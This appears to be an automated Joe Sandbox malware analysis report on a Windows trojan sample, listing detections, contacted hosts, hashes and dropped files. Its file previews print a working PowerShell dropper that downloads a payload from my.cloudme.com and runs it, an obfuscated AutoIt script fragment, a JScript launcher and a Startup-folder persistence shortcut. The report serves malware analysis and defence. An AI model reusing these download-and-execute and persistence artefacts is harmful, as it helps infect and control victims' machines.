dropped 31 conhost.exe 28->31         started        process15

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
T6l6gPxwQU.exe42%ReversingLabsWin64.Trojan.Povertel
T6l6gPxwQU.exe100%Joe Sandbox ML
SourceDetectionScannerLabelLink
C:\Users\Public\InformationCheck.exe3%ReversingLabs
C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif3%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://nuget.org/NuGet.exe0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://nuget.org/nuget.exe0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://oneget.orgX0%URL Reputationsafe
https://aka.ms/pscore680%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
https://oneget.org0%URL Reputationsafe
NameIPActiveMaliciousAntivirus DetectionReputation
my.cloudme.com
83.140.241.4
truefalse
    unknown
    nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs
    unknown
    unknownfalse
      unknown
      NameMaliciousAntivirus DetectionReputation
      https://my.cloudme.com/v1/ws2/:stream2/:small/small.txtfalse
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://www.autoitscript.com/autoit3/JT6l6gPxwQU.exe, 00000000.00000003.1683618137.00000202FF80E000.00000004.00000020.00020000.00000000.sdmp, T6l6gPxwQU.exe, 00000000.00000003.1690464925.00000202FF734000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000003.1794342033.0000000005BEE000.00000004.00000020.00020000.00000000.sdmpfalse
          unknown
          http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1768096648.000002BB018FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1790559122.000002BB10072000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000001.00000002.1768096648.000002BB01667000.00000004.00000800.00020000.00000000.sdmpfalse
            unknown
            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.1768096648.000002BB018A5000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.1768096648.000002BB018A5000.00000004.00000800.00020000.00000000.sdmpfalse
              unknown
              https://go.micropowershell.exe, 00000001.00000002.1768096648.000002BB0117C000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://contoso.com/powershell.exe, 00000001.00000002.1790559122.000002BB10072000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1768096648.000002BB018FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1790559122.000002BB10072000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://contoso.com/Licensepowershell.exe, 00000001.00000002.1790559122.000002BB10072000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://contoso.com/Iconpowershell.exe, 00000001.00000002.1790559122.000002BB10072000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://oneget.orgXpowershell.exe, 00000001.00000002.1768096648.000002BB01667000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://my.cloHJpowershell.exe, 00000001.00000002.1768096648.000002BB01365000.00000004.00000800.00020000.00000000.sdmpfalse
                unknown
                https://aka.ms/pscore68powershell.exe, 00000001.00000002.1768096648.000002BB00001000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://my.cloudme.compowershell.exe, 00000001.00000002.1768096648.000002BB00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1768096648.000002BB01365000.00000004.00000800.00020000.00000000.sdmpfalse
                  unknown
                  https://www.autoitscript.com/autoit3/T6l6gPxwQU.exe, 00000000.00000003.1683618137.00000202FF80E000.00000004.00000020.00020000.00000000.sdmp, T6l6gPxwQU.exe, 00000000.00000003.1690464925.00000202FF734000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000003.1794342033.0000000005BEE000.00000004.00000020.00020000.00000000.sdmpfalse
                    unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1768096648.000002BB00001000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.1768096648.000002BB018A5000.00000004.00000800.00020000.00000000.sdmpfalse
                      unknown
                      http://my.cloudme.compowershell.exe, 00000001.00000002.1768096648.000002BB015FA000.00000004.00000800.00020000.00000000.sdmpfalse
                        unknown
                        https://oneget.orgpowershell.exe, 00000001.00000002.1768096648.000002BB01667000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        83.140.241.4
                        my.cloudme.comSweden
                        39369PORT80SEfalse
                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1528376
                        Start date and time:2024-10-07 21:29:06 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 8m 54s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:12
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:T6l6gPxwQU.exe
                        renamed because original name is a hash value
                        Original Sample Name:fca042b18adf613d9a2be1646663698f.exe
                        Detection:MAL
                        Classification:mal100.expl.evad.winEXE@12/10@3/1
                        EGA Information:
                        • Successful, ratio: 75%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 48
                        • Number of non-executed functions: 250
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Execution Graph export aborted for target powershell.exe, PID 7364 because it is empty
                        • Not all processes where analyzed, report is missing behavior information
                        • Report creation exceeded maximum time and may have missing disassembly code information.
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        • VT rate limit hit for: T6l6gPxwQU.exe
                        TimeTypeDescription
                        15:29:59API Interceptor41x Sleep call for process: powershell.exe modified
                        15:30:45API Interceptor2859x Sleep call for process: InformationCheck.exe modified
                        15:31:04API Interceptor1689x Sleep call for process: SwiftWrite.pif modified
                        20:30:10AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        83.140.241.4file.exeGet hashmaliciousUnknownBrowse
                          file.exeGet hashmaliciousUnknownBrowse
                            file.exeGet hashmaliciousUnknownBrowse
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              my.cloudme.comfile.exeGet hashmaliciousUnknownBrowse
                              • 83.140.241.4
                              file.exeGet hashmaliciousUnknownBrowse
                              • 83.140.241.4
                              file.exeGet hashmaliciousUnknownBrowse
                              • 83.140.241.4
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              PORT80SEfile.exeGet hashmaliciousUnknownBrowse
                              • 83.140.241.4
                              file.exeGet hashmaliciousUnknownBrowse
                              • 83.140.241.4
                              file.exeGet hashmaliciousUnknownBrowse
                              • 83.140.241.4
                              mirai.x86.elfGet hashmaliciousMiraiBrowse
                              • 83.140.143.216
                              botx.mips.elfGet hashmaliciousMiraiBrowse
                              • 217.75.105.3
                              Q2bIN963Kt.elfGet hashmaliciousMirai, OkiruBrowse
                              • 82.96.9.42
                              62CajT4n8H.elfGet hashmaliciousUnknownBrowse
                              • 83.140.44.136
                              GpqAAlRMz4.elfGet hashmaliciousMoobotBrowse
                              • 82.96.9.72
                              jihIfXyawu.elfGet hashmaliciousUnknownBrowse
                              • 83.140.62.179
                              pTl791h3wF.elfGet hashmaliciousMiraiBrowse
                              • 82.96.9.54
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              3b5074b1b5d032e5620f69f9f700ff0ehttps://mailstat.us/tr/t/5w8u1qwlwl61e4h/1/https:/krediti.ca/#Y2FyYS5jJGNiZmxvb3JzaW5jLmNvbQ==Get hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                              • 83.140.241.4
                              https://url.avanan.click/v2/r01/___https://www.tiktok.com/qnspdA7?fni=6cbb&qfsl=js&xhjsj=gnt_zwq&yfwljy=myyux:ddBBB.lttlqj.hfdzwq?v=frudxdkniljyAkC.sEd.frl___.YXAzOnNvdXRoZXJua2l0Y2hlbmFuZGdyaWxsOmE6bzo2MGY0ZmI3MTkzODQ4OWRiOGFlZjY2ODI4ODlkMDk3NDo3OmRlYjY6NjI5YzkxZjFmNmQ3ZjI1NWIxN2UwYTI5ZTNmZjcyMTQyNTg3NmZhMDQyOWZlMDI4MDhmODRlNWVhYWU3MjJhZDpoOlQ6VA#ZHN5aHJlQG9sZ29vbmlrLmNvbQ==Get hashmaliciousUnknownBrowse
                              • 83.140.241.4
                              SecuriteInfo.com.Win64.TrojanX-gen.22573.8055.exeGet hashmaliciousUnknownBrowse
                              • 83.140.241.4
                              Ref#0503711.exeGet hashmaliciousAgentTeslaBrowse
                              • 83.140.241.4
                              scan_374783.jsGet hashmaliciousAgentTeslaBrowse
                              • 83.140.241.4
                              file.exeGet hashmaliciousCredential FlusherBrowse
                              • 83.140.241.4
                              shipping.exeGet hashmaliciousAgentTeslaBrowse
                              • 83.140.241.4
                              https://future.nhs.ukGet hashmaliciousUnknownBrowse
                              • 83.140.241.4
                              wrong bank details.exeGet hashmaliciousMassLogger RATBrowse
                              • 83.140.241.4
                              z1PO7311145.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • 83.140.241.4
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.piffile.exeGet hashmaliciousUnknownBrowse
                                file.exeGet hashmaliciousUnknownBrowse
                                  file.exeGet hashmaliciousUnknownBrowse
                                    file.exeGet hashmaliciousUnknownBrowse
                                      SecuriteInfo.com.Win32.Malware-gen.18298.24659.exeGet hashmaliciousRemcosBrowse
                                        SecuriteInfo.com.Win32.Malware-gen.18298.24659.exeGet hashmaliciousUnknownBrowse
                                          SecuriteInfo.com.Trojan.PWS.Steam.37582.19133.23112.exeGet hashmaliciousVidarBrowse
                                            SecuriteInfo.com.Trojan.PWS.Steam.37582.19133.23112.exeGet hashmaliciousVidarBrowse
                                              SecuriteInfo.com.Trojan.PWS.Steam.37481.30383.28482.exeGet hashmaliciousVidarBrowse
                                                3KBNUpajAQ.exeGet hashmaliciousUnknownBrowse
                                                  C:\Users\Public\InformationCheck.exefile.exeGet hashmaliciousUnknownBrowse
                                                    file.exeGet hashmaliciousUnknownBrowse
                                                      file.exeGet hashmaliciousUnknownBrowse
                                                        file.exeGet hashmaliciousUnknownBrowse
                                                          SecuriteInfo.com.Win32.Malware-gen.18298.24659.exeGet hashmaliciousRemcosBrowse
                                                            SecuriteInfo.com.Win32.Malware-gen.18298.24659.exeGet hashmaliciousUnknownBrowse
                                                              SecuriteInfo.com.Trojan.PWS.Steam.37582.19133.23112.exeGet hashmaliciousVidarBrowse
                                                                SecuriteInfo.com.Trojan.PWS.Steam.37582.19133.23112.exeGet hashmaliciousVidarBrowse
                                                                  SecuriteInfo.com.Trojan.PWS.Steam.37481.30383.28482.exeGet hashmaliciousVidarBrowse
                                                                    3KBNUpajAQ.exeGet hashmaliciousUnknownBrowse
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (1266)
                                                                      Category:dropped
                                                                      Size (bytes):3485127
                                                                      Entropy (8bit):4.739244309224887
                                                                      Encrypted:false
                                                                      SSDEEP:24576:qcb6NMAG7HuyDNNx+ZB8rKZsNuNxWdY74lb9UWrEiTO2yP:a
                                                                      MD5:3881B892AE0893A906D6CBE6DB39FE11
                                                                      SHA1:CF03508A1B930C37F5737227F917A6A36A6FD650
                                                                      SHA-256:35287AC8E4E594323E7E7D77C697E8089E2D7B4D1D661F4E2B0E1884A78C3221
                                                                      SHA-512:F7C49C8302028ED05C03C6805A657B26F82AF8A856AC723FBED10DB04452609611815928FDF290D57A3D3D0FA5C45805D72D14F71424AAE83A38144941BFE681
                                                                      Malicious:true
                                                                      Reputation:low
                                                                      Preview:.Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines).$PdBlocksResponseDat = '739119618772'.$VerifiedUnderstoodValidation = 34.$iosymphonyseemscrucial = 50.For $OdHBt = 28 To 865.If $VerifiedUnderstoodValidation = 32 Then.Sqrt(7955).FileExists(Wales("73]113]116]120]125]36]81]36]72]109]119]116]121]120]105]36",12/3)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 33 Then.ConsoleWriteError(Wales("75]106]103]119]122]102]119]126]48]74]125]121]119]102]48",25/5)).DriveStatus(Wales("87]72]79]72]70]82]80]80]88]81]76]70]68]87]76]82]81]86]67]71]72]86]76]85]72]67",6/2)).Dec(Wales("92]77]84]52]70]82]70]95]84]83]72]84]90]80]52]71]90]73]70]85]74]88]89]52]90]83]78]89]88]52",5/1)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 34 Then.$NuttenInvestorsRaleigh = Dec(Wales("104]113]105]86]85]
                                                                      Process:C:\Users\user\Desktop\T6l6gPxwQU.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):893608
                                                                      Entropy (8bit):6.620131693023677
                                                                      Encrypted:false
                                                                      SSDEEP:12288:6pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:6T3E53Myyzl0hMf1tr7Caw8M01
                                                                      MD5:C56B5F0201A3B3DE53E561FE76912BFD
                                                                      SHA1:2A4062E10A5DE813F5688221DBEB3F3FF33EB417
                                                                      SHA-256:237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
                                                                      SHA-512:195B98245BB820085AE9203CDB6D470B749D1F228908093E8606453B027B7D7681CCD7952E30C2F5DD40F8F0B999CCFC60EBB03419B574C08DE6816E75710D2C
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                      Joe Sandbox View:
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: SecuriteInfo.com.Win32.Malware-gen.18298.24659.exe, Detection: malicious, Browse
                                                                      • Filename: SecuriteInfo.com.Win32.Malware-gen.18298.24659.exe, Detection: malicious, Browse
                                                                      • Filename: SecuriteInfo.com.Trojan.PWS.Steam.37582.19133.23112.exe, Detection: malicious, Browse
                                                                      • Filename: SecuriteInfo.com.Trojan.PWS.Steam.37582.19133.23112.exe, Detection: malicious, Browse
                                                                      • Filename: SecuriteInfo.com.Trojan.PWS.Steam.37481.30383.28482.exe, Detection: malicious, Browse
                                                                      • Filename: 3KBNUpajAQ.exe, Detection: malicious, Browse
                                                                      Reputation:moderate, very likely benign file
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Users\user\Desktop\T6l6gPxwQU.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):373
                                                                      Entropy (8bit):5.122687847204781
                                                                      Encrypted:false
                                                                      SSDEEP:6:gsvPFyKoJFODu3Id25PaH9Ayz1gY1PaHzPMKds48QLh8JdWzH6mLF7djIXIINOQL:xv9ZoXOJrAymYEzdHGHWzH6mL5dsfHbf
                                                                      MD5:3E79D02E7B3EF1B1C347DBF4090CD366
                                                                      SHA1:90F33D606D9E2C544F0E3C48FBF02B0080501275
                                                                      SHA-256:3A54CC3C7B092F5FC5978A1A757D1FFC32C4539430433CE469662C980288137C
                                                                      SHA-512:8CC2F59F89414FA83246A5C7E3589C6038F23C83DE7A1EF3920AF1B57028B63C6105930675E9F99AFAC1F228712B27C2E2A8B0BC9D2DEC55EEB8C921C6D60740
                                                                      Malicious:true
                                                                      Preview:$url = "https://my.cloudme.com/v1/ws2/:stream2/:small/small.txt"..$outputFile = "C:\Users\Public\Details.au3"..$decodedRunooPath = "C:\Users\Public\InformationCheck.exe"......$content = Invoke-WebRequest -Uri $url -UseBasicParsing......$content.Content | Out-File -FilePath $outputFile -Encoding UTF8......Start-Process -FilePath $decodedRunooPath -ArgumentList $outputFile
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):64
                                                                      Entropy (8bit):1.1940658735648508
                                                                      Encrypted:false
                                                                      SSDEEP:3:NlllulxmH/lZ:NllUg
                                                                      MD5:D904BDD752B6F23D81E93ECA3BD8E0F3
                                                                      SHA1:026D8B0D0F79861746760B0431AD46BAD2A01676
                                                                      SHA-256:B393D3CEC8368794972E4ADD978B455A2F5BD37E3A116264DBED14DC8C67D6F2
                                                                      SHA-512:5B862B7F0BCCEF48E6A5A270C3F6271D7A5002465EAF347C6A266365F1B2CD3D88144C043D826D3456AA43484124D619BF16F9AEAB1F706463F553EE24CB5740
                                                                      Malicious:false
                                                                      Preview:@...e................................. ..............@..........
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Users\Public\InformationCheck.exe
                                                                      File Type:ASCII text, with very long lines (1266)
                                                                      Category:dropped
                                                                      Size (bytes):3485124
                                                                      Entropy (8bit):4.739228439290352
                                                                      Encrypted:false
                                                                      SSDEEP:24576:Dcb6NMAG7HuyDNNx+ZB8rKZsNuNxWdY74lb9UWrEiTO2yP:5
                                                                      MD5:F684D28C9ADBC8AA4A1CB8A64CB26FC5
                                                                      SHA1:4CB15F81E6EE5D5BB7B51FB22EEE1A9D6CD44BC1
                                                                      SHA-256:DA2215F0068D4E839C7698C3576CF3288E84C351E7634E1A45969DB7078755E9
                                                                      SHA-512:EE11BF3FDE51A9A70174C10AC82CF9C834A8DA9C0003B4E5BAD6E7C65E02623F2C30CB1AE86A62C5409DDD0952946F189B16095E5DAF5E7E54388352E748786D
                                                                      Malicious:false
                                                                      Preview:Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines).$PdBlocksResponseDat = '739119618772'.$VerifiedUnderstoodValidation = 34.$iosymphonyseemscrucial = 50.For $OdHBt = 28 To 865.If $VerifiedUnderstoodValidation = 32 Then.Sqrt(7955).FileExists(Wales("73]113]116]120]125]36]81]36]72]109]119]116]121]120]105]36",12/3)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 33 Then.ConsoleWriteError(Wales("75]106]103]119]122]102]119]126]48]74]125]121]119]102]48",25/5)).DriveStatus(Wales("87]72]79]72]70]82]80]80]88]81]76]70]68]87]76]82]81]86]67]71]72]86]76]85]72]67",6/2)).Dec(Wales("92]77]84]52]70]82]70]95]84]83]72]84]90]80]52]71]90]73]70]85]74]88]89]52]90]83]78]89]88]52",5/1)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 34 Then.$NuttenInvestorsRaleigh = Dec(Wales("104]113]105]86]85]96]
                                                                      Process:C:\Users\Public\InformationCheck.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):184
                                                                      Entropy (8bit):4.736154105743425
                                                                      Encrypted:false
                                                                      SSDEEP:3:RiMIpGXfeNH5E5wWAX+Ro6p4EkD5yKXW/Zi+0/RaMl85uWAX+Ro6p4EkD5yKXW/f:RiJbNHCwWDKaJkDrXW/Zz0tl8wWDKaJX
                                                                      MD5:612D28A7A2758BAAF54DB34272446F87
                                                                      SHA1:D4671632FC2141EF2AB2455F8923BC5197B2FD68
                                                                      SHA-256:94A83DD87CE7268703585A40C52491DDC7D332380B82832951DED047AAE6D73A
                                                                      SHA-512:B4B64908C674F92F5D4B1E761E123957E8D5CD6C3F433D2D5C6ADD19101FD0610EE968222D4CED31E8F21F7F022D880E7E723E4171BC7DB18C37A2000A58565B
                                                                      Malicious:true
                                                                      Preview:new ActiveXObject("Wscript.Shell").Run("\"C:\\Users\\user\\AppData\\Local\\WordGenius Technologies\\SwiftWrite.pif\" \"C:\\Users\\user\\AppData\\Local\\WordGenius Technologies\\G\"")
                                                                      Process:C:\Users\Public\InformationCheck.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):893608
                                                                      Entropy (8bit):6.620131693023677
                                                                      Encrypted:false
                                                                      SSDEEP:12288:6pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:6T3E53Myyzl0hMf1tr7Caw8M01
                                                                      MD5:C56B5F0201A3B3DE53E561FE76912BFD
                                                                      SHA1:2A4062E10A5DE813F5688221DBEB3F3FF33EB417
                                                                      SHA-256:237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
                                                                      SHA-512:195B98245BB820085AE9203CDB6D470B749D1F228908093E8606453B027B7D7681CCD7952E30C2F5DD40F8F0B999CCFC60EBB03419B574C08DE6816E75710D2C
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                      Joe Sandbox View:
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: SecuriteInfo.com.Win32.Malware-gen.18298.24659.exe, Detection: malicious, Browse
                                                                      • Filename: SecuriteInfo.com.Win32.Malware-gen.18298.24659.exe, Detection: malicious, Browse
                                                                      • Filename: SecuriteInfo.com.Trojan.PWS.Steam.37582.19133.23112.exe, Detection: malicious, Browse
                                                                      • Filename: SecuriteInfo.com.Trojan.PWS.Steam.37582.19133.23112.exe, Detection: malicious, Browse
                                                                      • Filename: SecuriteInfo.com.Trojan.PWS.Steam.37481.30383.28482.exe, Detection: malicious, Browse
                                                                      • Filename: 3KBNUpajAQ.exe, Detection: malicious, Browse
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                      File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >), ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):98
                                                                      Entropy (8bit):4.915531212533357
                                                                      Encrypted:false
                                                                      SSDEEP:3:HRAbABGQaFyw3pYot+kiE2J5yKXW/Zi+URAAy:HRYF5yjowkn23yKXW/Zzyy
                                                                      MD5:56D029782506F3E1F7EC40780D1DA27F
                                                                      SHA1:C7E0690DE9B31C951AC212A7E940E460267F2BA1
                                                                      SHA-256:5F412A72A3459ACA6A245DE1A280AB53CA5E6B306FECA32E0DF4B0B9B7863223
                                                                      SHA-512:1C5F108FB4325E4B47E9EE15F5D828569EE90676D5170D6D3B92BD13BD39CCAA68657CBB97761007154C73D2FFCFA8A3582879CB2097A899B22C1C83848A9D92
                                                                      Malicious:true
                                                                      Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" ..
                                                                      File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                      Entropy (8bit):7.310400449094374
                                                                      TrID:
                                                                      • Win64 Executable GUI (202006/5) 92.65%
                                                                      • Win64 Executable (generic) (12005/4) 5.51%
                                                                      • Generic Win/DOS Executable (2004/3) 0.92%
                                                                      • DOS Executable Generic (2002/1) 0.92%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:T6l6gPxwQU.exe
                                                                      File size:1'974'272 bytes
                                                                      MD5:fca042b18adf613d9a2be1646663698f
                                                                      SHA1:a7c91cd17ceeb8b1d0ac9873723f2b35487ca50c
                                                                      SHA256:3e358ac78679758f3720dd60d4e5fdff8323f2de436add34238d39c9bf969460
                                                                      SHA512:5109cb5cb9606c330110eee1449506abf7453d795c656b232ea12968ee481a3df698ba9a3dcc1a8c122eaa198e0b27677ab25fc4fd5e4e8909a6019b40820bdc
                                                                      SSDEEP:49152:x2EYTb8atv1orq+pEiSDTj1VyvBatZeI4LeO07B+Iy3AqMl1ZcK:gXbIrq3o/07B+yqm1Z
                                                                      TLSH:EB95C01973A4419DFEABE1B6CA13C607D7B17C460277861F02A46B766F337712A2E321
                                                                      File Content Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......o1).+PG.+PG.+PG.....>PG......PG......PG.....*PG.y8B..PG.y8C.:PG.y8D.#PG."(..#PG."(..*PG."(...PG.+PF..RG..9I.{PG..9D.*PG..9..*PG
                                                                      Icon Hash:13ebebe37b0db4f9
                                                                      Entrypoint:0x14002549c
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x140000000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
